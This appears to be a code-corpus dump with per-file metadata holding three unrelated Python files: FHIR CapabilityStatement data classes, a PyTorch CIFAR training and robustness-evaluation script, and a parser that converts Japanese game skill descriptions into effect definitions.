__name__ = 'CapabilityStatement_Endpoint'
def __init__(self, dict_values=None):
self.protocol = None
# reference to Coding
self.address = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Endpoint',
'child_variable': 'protocol'},
]
class CapabilityStatement_SupportedMessage(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: The mode of this event declaration - whether application is
sender or receiver.
definition: Points to a message definition that identifies the
messaging event, message structure, allowed responses, etc.
"""
__name__ = 'CapabilityStatement_SupportedMessage'
def __init__(self, dict_values=None):
self.mode = None
# type: str
# possible values: sender, receiver
self.definition = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.mode is not None:
for value in self.mode:
if value is not None and value.lower() not in [
'sender', 'receiver']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'sender, receiver'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_SupportedMessage',
'child_variable': 'definition'},
]
class CapabilityStatement_Event(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: A coded identifier of a supported messaging event.
category: The impact of the content of the message.
mode: The mode of this event declaration - whether an application is a
sender or receiver.
focus: A resource associated with the event. This is the resource
that defines the event.
request: Information about the request for this event.
response: Information about the response for this event.
documentation: Guidance on how this event is handled, such as internal
system trigger points, business rules, etc.
"""
__name__ = 'CapabilityStatement_Event'
def __init__(self, dict_values=None):
self.code = None
# reference to Coding
self.category = None
# type: str
# possible values: Consequence, Currency, Notification
self.mode = None
# type: str
# possible values: sender, receiver
self.focus = None
# type: str
self.request = None
# reference to Reference: identifier
self.response = None
# reference to Reference: identifier
self.documentation = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.category is not None:
for value in self.category:
if value is not None and value.lower() not in [
'consequence', 'currency', 'notification']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'Consequence, Currency, Notification'))
if self.mode is not None:
for value in self.mode:
if value is not None and value.lower() not in [
'sender', 'receiver']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'sender, receiver'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Event',
'child_variable': 'request'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Event',
'child_variable': 'response'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Event',
'child_variable': 'code'},
]
class CapabilityStatement_Document(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: Mode of this document declaration - whether an application is a
producer or consumer.
documentation: A description of how the application supports or uses
the specified document profile. For example, when documents are
created, what action is taken with consumed documents, etc.
profile: A constraint on a resource used in the document.
"""
__name__ = 'CapabilityStatement_Document'
def __init__(self, dict_values=None):
self.mode = None
# type: str
# possible values: producer, consumer
self.documentation = None
# type: str
self.profile = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.mode is not None:
for value in self.mode:
if value is not None and value.lower() not in [
'producer', 'consumer']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'producer, consumer'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Document',
'child_variable': 'profile'},
]
| cardea/fhir/CapabilityStatement.py | 42,927 | A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
resourceType: This is a CapabilityStatement resource
url: An absolute URI that is used to identify this capability
statement when it is referenced in a specification, model, design or
an instance. This SHALL be a URL, SHOULD be globally unique, and
SHOULD be an address at which this capability statement is (or will
be) published. The URL SHOULD include the major version of the
capability statement. For more information see [Technical and Business
Versions](resource.html#versions).
version: The identifier that is used to identify this version of the
capability statement when it is referenced in a specification, model,
design or instance. This is an arbitrary value managed by the
capability statement author and is not expected to be globally unique.
For example, it might be a timestamp (e.g. yyyymmdd) if a managed
version is not available. There is also no expectation that versions
can be placed in a lexicographical sequence.
name: A natural language name identifying the capability statement.
This name should be usable as an identifier for the module by machine
processing applications such as code generation.
title: A short, descriptive, user-friendly title for the capability
statement.
status: The status of this capability statement. Enables tracking the
life-cycle of the content.
experimental: A boolean value to indicate that this capability
statement is authored for testing purposes (or
education/evaluation/marketing), and is not intended to be used for
genuine usage.
date: The date (and optionally time) when the capability statement
was published. The date must change if and when the business version
changes and it must change if the status code changes. In addition, it
should change when the substantive content of the capability statement
changes.
publisher: The name of the individual or organization that published
the capability statement.
contact: Contact details to assist a user in finding and communicating
with the publisher.
description: A free text natural language description of the
capability statement from a consumer's perspective. Typically, this is
used when the capability statement describes a desired rather than an
actual solution, for example as a formal expression of requirements as
part of an RFP.
useContext: The content was developed with a focus and intent of
supporting the contexts that are listed. These terms may be used to
assist with indexing and searching for appropriate capability
statement instances.
jurisdiction: A legal or geographic region in which the capability
statement is intended to be used.
purpose: Explaination of why this capability statement is needed and
why it has been designed as it has.
copyright: A copyright statement relating to the capability statement
and/or its contents. Copyright statements are generally legal
restrictions on the use and publishing of the capability statement.
kind: The way that this statement is intended to be used, to describe
an actual running instance of software, a particular product (kind not
instance of software) or a class of implementation (e.g. a desired
purchase).
instantiates: Reference to a canonical URL of another
CapabilityStatement that this software implements or uses. This
capability statement is a published API description that corresponds
to a business service. The rest of the capability statement does not
need to repeat the details of the referenced resource, but can do so.
software: Software that is covered by this capability statement. It
is used when the capability statement describes the capabilities of a
particular software version, independent of an installation.
implementation: Identifies a specific implementation instance that is
described by the capability statement - i.e. a particular
installation, rather than the capabilities of a software program.
fhirVersion: The version of the FHIR specification on which this
capability statement is based.
acceptUnknown: A code that indicates whether the application accepts
unknown elements or extensions when reading resources.
format: A list of the formats supported by this implementation using
their content types.
patchFormat: A list of the patch formats supported by this
implementation using their content types.
implementationGuide: A list of implementation guides that the server
does (or should) support in their entirety.
profile: A list of profiles that represent different use cases
supported by the system. For a server, "supported by the system" means
the system hosts/produces a set of resources that are conformant to a
particular profile, and allows clients that use its services to search
using this profile and to find appropriate data. For a client, it
means the system will search by this profile and process data
according to the guidance implicit in the profile. See further
discussion in [Using Profiles](profiling.html#profile-uses).
rest: A definition of the restful capabilities of the solution, if
any.
messaging: A description of the messaging capabilities of the
solution.
document: A document definition.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
type: Mime type for a certificate.
blob: Actual certificate.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: Mode of this document declaration - whether an application is a
producer or consumer.
documentation: A description of how the application supports or uses
the specified document profile. For example, when documents are
created, what action is taken with consumed documents, etc.
profile: A constraint on a resource used in the document.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
protocol: A list of the messaging transport protocol(s) identifiers,
supported by this endpoint.
address: The network address of the end-point. For solutions that do
not use network addresses for routing, it can be just an identifier.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: A coded identifier of a supported messaging event.
category: The impact of the content of the message.
mode: The mode of this event declaration - whether an application is a
sender or receiver.
focus: A resource associated with the event. This is the resource
that defines the event.
request: Information about the request for this event.
response: Information about the response for this event.
documentation: Guidance on how this event is handled, such as internal
system trigger points, business rules, etc.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
description: Information about the specific installation that this
capability statement relates to.
url: An absolute base URL for the implementation. This forms the base
for REST interfaces as well as the mailbox and document interfaces.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: Coded identifier of the operation, supported by the system
resource.
documentation: Guidance specific to the implementation of this
operation, such as 'delete is a logical delete' or 'updates are only
allowed with version id' or 'creates permitted from pre-authorized
certificates only'.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: A coded identifier of the operation, supported by the system.
documentation: Guidance specific to the implementation of this
operation, such as limitations on the kind of transactions allowed, or
information about system wide search is implemented.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
endpoint: An endpoint (network accessible address) to which messages
and/or replies are to be sent.
reliableCache: Length if the receiver's reliable messaging cache in
minutes (if a receiver) or how long the cache length on the receiver
should be (if a sender).
documentation: Documentation about the system's messaging capabilities
for this endpoint not otherwise documented by the capability
statement. For example, the process for becoming an authorized
messaging exchange partner.
supportedMessage: References to message definitions for messages this
system can send or receive.
event: A description of the solution's support for an event at this
end-point.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: The name of the operation or query. For an operation, this is
the name prefixed with $ and used in the URL. For a query, this is
the name used in the _query parameter when the query is called.
definition: Where the formal definition can be found.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
type: A type of resource exposed via the restful interface.
profile: A specification of the profile that describes the solution's
overall support for the resource, including any constraints on
cardinality, bindings, lengths or other limitations. See further
discussion in [Using Profiles](profiling.html#profile-uses).
documentation: Additional information about the resource type used by
the system.
interaction: Identifies a restful operation supported by the solution.
versioning: This field is set to no-version to specify that the system
does not support (server) or use (client) versioning for this resource
type. If this has some other value, the server must at least correctly
track and populate the versionId meta-property on resources. If the
value is 'versioned-update', then the server supports all the
versioning features, including using e-tags for version integrity in
the API.
readHistory: A flag for whether the server is able to return past
versions as part of the vRead operation.
updateCreate: A flag to indicate that the server allows or needs to
allow the client to create new identities on the server (e.g. that is,
the client PUTs to a location where there is no existing resource).
Allowing this operation means that the server allows the client to
create new identities on the server.
conditionalCreate: A flag that indicates that the server supports
conditional create.
conditionalRead: A code that indicates how the server supports
conditional read.
conditionalUpdate: A flag that indicates that the server supports
conditional update.
conditionalDelete: A code that indicates how the server supports
conditional delete.
referencePolicy: A set of flags that defines how references are
supported.
searchInclude: A list of _include values supported by the server.
searchRevInclude: A list of _revinclude (reverse include) values
supported by the server.
searchParam: Search parameters for implementations to support and/or
make use of - either references to ones defined in the specification,
or additional ones defined for/by the implementation.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: Identifies whether this portion of the statement is describing
the ability to initiate or receive restful operations.
documentation: Information about the system's restful capabilities
that apply across all applications, such as security.
security: Information about security implementation from an interface
perspective - what a client needs to know.
resource: A specification of the restful capabilities of the solution
for a specific resource type.
interaction: A specification of restful operations supported by the
system.
searchParam: Search parameters that are supported for searching all
resources for implementations to support and/or make use of - either
references to ones defined in the specification, or additional ones
defined for/by the implementation.
operation: Definition of an operation or a named query together with
its parameters and their meaning and type.
compartment: An absolute URI which is a reference to the definition of
a compartment that the system supports. The reference is to a
CompartmentDefinition resource by its canonical URL.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: The name of the search parameter used in the interface.
definition: An absolute URI that is a formal reference to where this
parameter was first defined, so that a client can be confident of the
meaning of the search parameter (a reference to
[[[SearchParameter.url]]]).
type: The type of value a search parameter refers to, and how the
content is interpreted.
documentation: This allows documentation of any distinct behaviors
about how the search parameter is used. For example, text matching
algorithms.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
cors: Server adds CORS headers when responding to requests - this
enables javascript applications to use the server.
service: Types of security services that are supported/required by the
system.
description: General description of how security works.
certificate: Certificates associated with security profiles.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: Name software is known by.
version: The version identifier for the software covered by this
statement.
releaseDate: Date this version of the software was released.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: The mode of this event declaration - whether application is
sender or receiver.
definition: Points to a message definition that identifies the
messaging event, message structure, allowed responses, etc.
type: str possible values: CapabilityStatement type: str type: str type: str type: str type: str possible values: draft, active, retired, unknown type: bool type: str type: str type: list reference to ContactDetail type: str type: list reference to UsageContext type: list reference to CodeableConcept type: str type: str type: str possible values: instance, capability, requirements type: list reference to CapabilityStatement_Software reference to CapabilityStatement_Implementation type: str type: str possible values: no, extensions, elements, both type: list type: list type: list type: list reference to Reference: identifier type: list reference to CapabilityStatement_Rest type: list reference to CapabilityStatement_Messaging type: list reference to CapabilityStatement_Document unique identifier for object class type: str type: str type: str unique identifier for object class type: str type: str unique identifier for object class type: str possible values: client, server type: str reference to CapabilityStatement_Security type: list reference to CapabilityStatement_Resource type: list reference to CapabilityStatement_Interaction1 type: list reference to CapabilityStatement_SearchParam type: list reference to CapabilityStatement_Operation type: list unique identifier for object class type: bool type: list reference to CodeableConcept type: str type: list reference to CapabilityStatement_Certificate unique identifier for object class type: str type: str unique identifier for object class type: str reference to Reference: identifier type: str type: list reference to CapabilityStatement_Interaction type: str possible values: no-version, versioned, versioned-update type: bool type: bool type: bool type: str possible values: not-supported, modified-since, not-match, full-support type: bool type: str possible values: not-supported, single, multiple type: list possible values: literal, logical, resolves, enforced, local type: list type: list type: list reference to CapabilityStatement_SearchParam unique identifier for object class type: str possible values: read, vread, update, patch, delete, history-instance, history-type, create, search-type type: str unique identifier for object class type: str type: str type: str possible values: number, date, string, token, reference, composite, quantity, uri type: str unique identifier for object class type: str possible values: transaction, batch, search-system, history-system type: str unique identifier for object class type: str reference to Reference: identifier unique identifier for object class type: list reference to CapabilityStatement_Endpoint type: int type: str type: list reference to CapabilityStatement_SupportedMessage type: list reference to CapabilityStatement_Event unique identifier for object class reference to Coding type: str unique identifier for object class type: str possible values: sender, receiver reference to Reference: identifier unique identifier for object class reference to Coding type: str possible values: Consequence, Currency, Notification type: str possible values: sender, receiver type: str reference to Reference: identifier reference to Reference: identifier type: str unique identifier for object class type: str possible values: producer, consumer type: str reference to Reference: identifier unique identifier for object class | 20,571 | en | 0.806964 |
import os
import sys
import argparse
import datetime
import time
import csv
import os.path as osp
import numpy as np
import warnings
import importlib
import pandas as pd
warnings.filterwarnings('ignore')
import torch
import torch.nn as nn
from torch.optim import lr_scheduler
import torch.backends.cudnn as cudnn
import torchvision
from datasets import CIFAR10D, CIFAR100D
from utils.utils import AverageMeter, Logger, save_networks, load_networks
from core import train, test, test_robustness
parser = argparse.ArgumentParser("Training")
# dataset
parser.add_argument('--data', type=str, default='./data')
parser.add_argument('--outf', type=str, default='./results')
parser.add_argument('-d', '--dataset', type=str, default='cifar10')
parser.add_argument('--workers', default=8, type=int, help="number of data loading workers (default: 8)")
# optimization
parser.add_argument('--batch-size', type=int, default=128)
parser.add_argument('--lr', type=float, default=0.1, help="learning rate for model")
parser.add_argument('--max-epoch', type=int, default=200)
parser.add_argument('--stepsize', type=int, default=30)
parser.add_argument('--aug', type=str, default='none', help='none, aprs')
# model
parser.add_argument('--model', type=str, default='wider_resnet_28_10')
# misc
parser.add_argument('--eval-freq', type=int, default=10)
parser.add_argument('--print-freq', type=int, default=100)
parser.add_argument('--gpu', type=str, default='0')
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--use-cpu', action='store_true')
parser.add_argument('--eval', action='store_true', help="Eval", default=False)
# parameters for generating adversarial examples
parser.add_argument('--epsilon', '-e', type=float, default=0.0157,
help='maximum perturbation of adversaries (4/255=0.0157)')
parser.add_argument('--alpha', '-a', type=float, default=0.00784,
help='movement multiplier per iteration when generating adversarial examples (2/255=0.00784)')
parser.add_argument('--k', '-k', type=int, default=10,
help='maximum iteration when generating adversarial examples')
parser.add_argument('--perturbation_type', '-p', choices=['linf', 'l2'], default='linf',
help='the type of the perturbation (linf or l2)')
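# Illustrative sketch only (the actual attack generation lives in the imported
# `core` module, whose implementation is not shown here): a standard PGD-style
# L-inf attack would typically combine epsilon, alpha and k roughly as follows,
# where x, y and net stand for a clean batch, its labels and the model:
#
#     x_adv = x + torch.empty_like(x).uniform_(-args.epsilon, args.epsilon)
#     for _ in range(args.k):
#         x_adv.requires_grad_(True)
#         loss = nn.CrossEntropyLoss()(net(x_adv), y)
#         grad = torch.autograd.grad(loss, x_adv)[0]
#         x_adv = x_adv.detach() + args.alpha * grad.sign()
#         x_adv = x + torch.clamp(x_adv - x, -args.epsilon, args.epsilon)
#         x_adv = torch.clamp(x_adv, 0.0, 1.0)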
args = parser.parse_args()
options = vars(args)
if not os.path.exists(options['outf']):
os.makedirs(options['outf'])
if not os.path.exists(options['data']):
os.makedirs(options['data'])
sys.stdout = Logger(osp.join(options['outf'], 'logs.txt'))
def main():
torch.manual_seed(options['seed'])
os.environ['CUDA_VISIBLE_DEVICES'] = options['gpu']
use_gpu = torch.cuda.is_available()
if options['use_cpu']: use_gpu = False
options.update({'use_gpu': use_gpu})
if use_gpu:
print("Currently using GPU: {}".format(options['gpu']))
cudnn.benchmark = True
torch.cuda.manual_seed_all(options['seed'])
else:
print("Currently using CPU")
if 'cifar10' == options['dataset']:
Data = CIFAR10D(dataroot=options['data'], batch_size=options['batch_size'], _transforms=options['aug'], _eval=options['eval'])
OODData = CIFAR100D(dataroot=options['data'], batch_size=options['batch_size'], _transforms=options['aug'])
else:
Data = CIFAR100D(dataroot=options['data'], batch_size=options['batch_size'], _transforms=options['aug'], _eval=options['eval'])
OODData = CIFAR10D(dataroot=options['data'], batch_size=options['batch_size'], _transforms=options['aug'])
trainloader, testloader, outloader = Data.train_loader, Data.test_loader, OODData.test_loader
num_classes = Data.num_classes
print("Creating model: {}".format(options['model']))
if 'wide_resnet' in options['model']:
print('wide_resnet')
from model.wide_resnet import WideResNet
net = WideResNet(40, num_classes, 2, 0.0)
elif 'allconv' in options['model']:
print('allconv')
from model.allconv import AllConvNet
net = AllConvNet(num_classes)
elif 'densenet' in options['model']:
print('densenet')
from model.densenet import densenet
net = densenet(num_classes=num_classes)
elif 'resnext' in options['model']:
print('resnext29')
from model.resnext import resnext29
net = resnext29(num_classes)
else:
print('resnet18')
from model.resnet import ResNet18
net = ResNet18(num_classes=num_classes)
# define loss function (criterion) and optimizer
    criterion = nn.CrossEntropyLoss()
if use_gpu:
net = nn.DataParallel(net, device_ids=[i for i in range(len(options['gpu'].split(',')))]).cuda()
criterion = criterion.cuda()
file_name = '{}_{}_{}'.format(options['model'], options['dataset'], options['aug'])
if options['eval']:
net, criterion = load_networks(net, options['outf'], file_name, criterion=criterion)
outloaders = Data.out_loaders
results = test(net, criterion, testloader, outloader, epoch=0, **options)
acc = results['ACC']
res = dict()
res['ACC'] = dict()
acc_res = []
for key in Data.out_keys:
results = test_robustness(net, criterion, outloaders[key], epoch=0, label=key, **options)
print('{} (%): {:.3f}\t'.format(key, results['ACC']))
res['ACC'][key] = results['ACC']
acc_res.append(results['ACC'])
print('Mean ACC:', np.mean(acc_res))
print('Mean Error:', 100-np.mean(acc_res))
return
params_list = [{'params': net.parameters()},
{'params': criterion.parameters()}]
optimizer = torch.optim.SGD(params_list, lr=options['lr'], momentum=0.9, nesterov=True, weight_decay=5e-4)
scheduler = lr_scheduler.MultiStepLR(optimizer, gamma=0.2, milestones=[60, 120, 160, 190])
start_time = time.time()
best_acc = 0.0
for epoch in range(options['max_epoch']):
print("==> Epoch {}/{}".format(epoch+1, options['max_epoch']))
train(net, criterion, optimizer, trainloader, epoch=epoch, **options)
if options['eval_freq'] > 0 and (epoch+1) % options['eval_freq'] == 0 or (epoch+1) == options['max_epoch'] or epoch > 160:
print("==> Test")
results = test(net, criterion, testloader, outloader, epoch=epoch, **options)
if best_acc < results['ACC']:
best_acc = results['ACC']
print("Best Acc (%): {:.3f}\t".format(best_acc))
save_networks(net, options['outf'], file_name, criterion=criterion)
scheduler.step()
elapsed = round(time.time() - start_time)
elapsed = str(datetime.timedelta(seconds=elapsed))
print("Finished. Total elapsed time (h:m:s): {}".format(elapsed))
if __name__ == '__main__':
main()
| main.py | 6,885 | dataset optimization model misc parameters for generating adversarial examples define loss function (criterion) and optimizer | 125 | en | 0.490819 |
import requests
from bs4 import BeautifulSoup
import jinja2
import re
class Chara:
name = ''
job = ''
hp = 0
mp = 0
str = 0
end = 0
dex = 0
agi = 0
mag = 0
killer = ""
counter_hp = ""
skills = ""
passive_skills = ""
class HtmlParser:
def __init__(self, text):
self.soup = BeautifulSoup(text, 'html.parser')
self.soup_ptr = self.soup.find("div", class_='toc')
def get_next_div(self):
found = False
while not found:
self.soup_ptr = self.soup_ptr.find_next_sibling("div", class_='basic')
if self.soup_ptr.find("table") is not None:
found = True
return self.soup_ptr
def parse_effs(effs_str):
effs = []
if "カウンター率" in effs_str:
effs.append("Ability.counter_rate")
if "ペネトレーション率" in effs_str:
effs.append("Ability.pene_rate")
if "必殺技ゲージ" in effs_str:
effs.append("Ability.energy_bar")
if "クリティカル率" in effs_str:
effs.append("Ability.crit_rate")
if "ガード率" in effs_str:
effs.append("Ability.guard_rate")
if "カウンター発生" in effs_str:
effs.append("SuccessUp.counter")
if "ペネトレーション発生" in effs_str:
effs.append("SuccessUp.pene")
if "クリティカル発生" in effs_str:
effs.append("SuccessUp.crit")
if "ガード発生" in effs_str:
effs.append("SuccessUp.guard")
if "力と魔力" in effs_str:
effs.append("Ability.str")
effs.append("Ability.mag")
elif "力と" in effs_str:
effs.append("Ability.str")
elif "力、魔力" in effs_str:
effs.append("Ability.str")
effs.append("Ability.mag")
elif "魔力" in effs_str:
effs.append("Ability.mag")
elif "の力" in effs_str:
effs.append("Ability.str")
elif "、力" in effs_str:
effs.append("Ability.str")
elif effs_str.startswith("力"):
effs.append("Ability.str")
if "敏捷" in effs_str:
effs.append("Ability.agi")
if "器用" in effs_str:
effs.append("Ability.dex")
if "耐久" in effs_str:
effs.append("Ability.end")
if "火属性耐性" in effs_str:
effs.append("Endurance.fire")
if "地属性耐性" in effs_str:
effs.append("Endurance.earth")
if "風属性耐性" in effs_str:
effs.append("Endurance.wind")
if "水属性耐性" in effs_str:
effs.append("Endurance.ice")
if "雷属性耐性" in effs_str:
effs.append("Endurance.thunder")
if "光属性耐性" in effs_str:
effs.append("Endurance.light")
if "闇属性耐性" in effs_str:
effs.append("Endurance.dark")
if "物理耐性" in effs_str:
effs.append("Endurance.phy")
if "魔法耐性" in effs_str:
effs.append("Endurance.mag")
if "全体攻撃ダメージ" in effs_str:
effs.append("Endurance.foes")
if "単体攻撃ダメージ" in effs_str:
effs.append("Endurance.foe")
if "火属性攻撃" in effs_str:
effs.append("Damage.fire")
if "地属性攻撃" in effs_str:
effs.append("Damage.earth")
if "風属性攻撃" in effs_str:
effs.append("Damage.wind")
if "水属性攻撃" in effs_str:
effs.append("Damage.ice")
if "雷属性攻撃" in effs_str:
effs.append("Damage.thunder")
if "光属性攻撃" in effs_str:
effs.append("Damage.light")
if "闇属性攻撃" in effs_str:
effs.append("Damage.dark")
if "全体攻撃被ダメージ" in effs_str:
effs.append("Endurance.foes")
if "単体攻撃被ダメージ" in effs_str:
effs.append("Endurance.foe")
if "HP" in effs_str or "HP" in effs_str:
effs.append("Recover.hp_turn")
if "MP" in effs_str or "MP" in effs_str:
effs.append("Recover.mp_turn")
return effs
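# Illustrative examples (not part of the original script):
#   parse_effs("力と魔力") -> ["Ability.str", "Ability.mag"]
#   parse_effs("物理耐性") -> ["Endurance.phy"]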
def gen_eff_str(effs, scope, val_for_eff=None, turn=None):
eff_enums = []
for e in effs:
if turn and val_for_eff:
eff_enums.append(f"Effect({scope}, {e}, {val_for_eff}, {turn})")
elif val_for_eff:
eff_enums.append(f"Effect({scope}, {e}, {val_for_eff})")
else:
eff_enums.append(f"Effect({scope}, {e}, 0)")
ret = ", ".join(eff_enums)
return ret
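# Illustrative example (not part of the original script):
#   gen_eff_str(["Ability.str"], "Scope.my_team", 0.2, "3")
#   -> "Effect(Scope.my_team, Ability.str, 0.2, 3)"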
def parse_turns(text):
m = re.match(r".+(\d)ターンの間.+", text, re.UNICODE)
if m is None:
return None
turn = m.group(1)
return turn
def parse_scope(scope_str):
if "敵全体" in scope_str:
scope = "Scope.foes"
elif "敵単体" in scope_str:
scope = "Scope.foe"
elif "味方全体" in scope_str:
scope = "Scope.my_team"
elif "自分" in scope_str:
scope = "Scope.my_self"
else:
raise ValueError
return scope
def parse_atk(text):
scope = parse_scope(text)
if "超強威力" in text:
power = "Power.ultra"
elif "超威力" in text:
power = "Power.super"
elif "強威力" in text:
power = "Power.high"
elif "中威力" in text:
power = "Power.mid"
elif "弱威力" in text:
power = "Power.low"
else:
raise ValueError
m = re.match(r".+(\w)属性(\w\w)攻撃.+", text, re.UNICODE)
attr = m.group(1)
phy_mag = m.group(2)
if attr == "火":
attr_dmg = "Damage.fire"
elif attr == "地":
attr_dmg = "Damage.earth"
elif attr == "風":
attr_dmg = "Damage.wind"
elif attr == "水":
attr_dmg = "Damage.ice"
elif attr == "雷":
attr_dmg = "Damage.thunder"
elif attr == "光":
attr_dmg = "Damage.light"
elif attr == "闇":
attr_dmg = "Damage.dark"
else:
raise ValueError
if phy_mag == "物理":
atk = "Attack.phy"
elif phy_mag == "魔法":
atk = "Attack.mag"
else:
raise ValueError
temp_boost = ""
if "技発動時のみ力を上昇" in text or "技発動時のみ魔力を上昇" in text:
temp_boost = "temp_boost=True, "
boost_by_buff = ""
m = re.match(r".*自分の(\w+)上昇効果1つにつき、この技の威力が(\d+)[%%]上昇.*", text, re.UNICODE)
if m is not None:
up_val = int(m.group(2))
up_val /= 100
up_indexes = m.group(1)
effs = parse_effs(up_indexes)
enum_str = gen_eff_str(effs, "Scope.my_self", up_val)
boost_by_buff = f'boost_by_buff=[{enum_str}],'
atk_str = f"{scope}, {power}, {attr_dmg}, {atk}, {temp_boost} {boost_by_buff}"
return atk_str
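# Illustrative example (not part of the original script): for a skill text like
# "敵全体に強威力の火属性物理攻撃。" this returns roughly
# "Scope.foes, Power.high, Damage.fire, Attack.phy, " (the temp-boost and
# boost-by-buff fields stay empty).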
def parse_debuff(text, turn):
m = re.match(r".*(敵単体|敵全体)(.+?)を?(\d+)[%%]減少.*", text, re.UNICODE)
if m is None:
m = re.match(r".+(敵単体|敵全体)(.+被ダメージ).*を(\d+)[%%]増加.*", text, re.UNICODE)
if m is None:
return None
scope = parse_scope(m.group(1))
effs_str = m.group(2)
effs = parse_effs(effs_str)
down_val = int(m.group(3))
down_val /= 100
enum_str = gen_eff_str(effs, scope, down_val, turn)
return enum_str
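# Illustrative example (not part of the original script):
#   parse_debuff("敵全体の物理耐性を20%減少", "3")
#   -> "Effect(Scope.foes, Endurance.phy, 0.2, 3)"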
def parse_recover_hp(text, turn):
m = re.match(r".*(\d+)ターンの間、(味方全体|自分)に(\d+)[%%]の(HP|HP)治癒付与.*", text, re.UNICODE)
if m:
turn = m.group(1)
scope = parse_scope(m.group(2))
up_val = int(m.group(3)) / 100
return f"Effect({scope}, Recover.hp_turn, {up_val}, {turn})"
m = re.match(r".*味方全体に\w+の(HP|HP)回復技.*", text, re.UNICODE)
if m:
return f"Effect(Scope.my_team, Recover.hp_imm, 0.8)"
m = re.match(r".*味方全体の(HP|HP)を(\d+)[%%]回復.*", text, re.UNICODE)
if m:
up_val = int(m.group(2)) / 100
return f"Effect(Scope.my_team, Recover.hp_imm, {up_val})"
def parse_recover_mp(text, turn):
m = re.match(r".*(\d+)ターンの間、(味方全体|自分)に(\d+)[%%]の(MP|MP)回復.*", text, re.UNICODE)
if m:
turn = m.group(1)
scope = parse_scope(m.group(2))
up_val = int(m.group(3)) / 100
return f"Effect({scope}, Recover.mp_turn, {up_val}, {turn})"
m = re.match(r".*味方全体の(MP|MP)を(\d+)[%%]回復.*", text, re.UNICODE)
if m:
up_val = int(m.group(2)) / 100
return f"Effect(Scope.my_team, Recover.mp_imm, {up_val})"
m = re.match(r".*自分の(MP|MP)を(\d+)[%%]回復.*", text, re.UNICODE)
if m:
up_val = int(m.group(2)) / 100
return f"Effect(Scope.my_self, Recover.mp_imm, {up_val})"
def parse_buff(text, turn):
m = re.match(r".*(味方全体|自分)(.+)を(\d+)[%%](上昇|軽減).*", text, re.UNICODE)
if m is None:
return None
scope = parse_scope(m.group(1))
effs_str = m.group(2)
effs = parse_effs(effs_str)
up_val = int(m.group(3))
up_val /= 100
enum_str = gen_eff_str(effs, scope, up_val, turn)
return enum_str
def parse_passive_buff(text):
ret_effs = []
scope = "Scope.my_self"
m = re.match(r"(.+)が(\d+)[%%]上昇.*", text, re.UNICODE)
if m:
effs_str = m.group(1)
effs = parse_effs(effs_str)
effs = [e for e in effs if "Ability" not in e]
up_val = int(m.group(2))
up_val /= 100
enum_str = gen_eff_str(effs, scope, up_val)
